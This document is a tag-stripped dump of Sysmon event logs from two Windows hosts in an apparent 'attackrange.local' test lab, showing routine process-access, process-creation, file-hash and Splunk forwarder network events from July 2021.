10341000x80000000000000001046022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:27.992{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:27.976{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+1f9aa4|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+175730|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+16d7a6|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07 154100x80000000000000001046017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.961{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\Temp\test"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001046016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:27.453{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=710ECB0FE8A7B309F44B48BEADD608C7,SHA256=AA0AEDFF3B4AD6B69A50A498DBCE77D095D7AC77219FEA45206C74A334752F01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.683{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.668{0C1E0330-F2DB-60EB-4079-00000000D001}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:26.269{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57159-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000806147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.167{0C1E0330-F2DA-60EB-3F79-00000000D001}25401716C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:27.152{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE343B69CA6CFD178758C15C92C8FD7,SHA256=BCAA75772CA53BBC9EDA09AD8CFECBF59BA04549FAC6DB24C79C6616E1734A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.973{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3BE271808CAEDCBEDA8807448EC297,SHA256=6F096B4BD2ED602C5B6D5DEC7B7E4A779C502E24294CCD61A36342A2FADD235D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.972{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=584A2ECFD1AF641152B1951EDA786592,SHA256=0594C17B0D1896C2069894E5950507802787E693BBE9B69D1A39698A2EFA6674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.454{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B4F3FC626B4DAA96D37854091613E29,SHA256=E34BD2780BAEC370600D79212366E91285296CC2238FC07BC38BCC2BEC7F6ED3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.495{0C1E0330-F2DC-60EB-4179-00000000D001}31602328C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
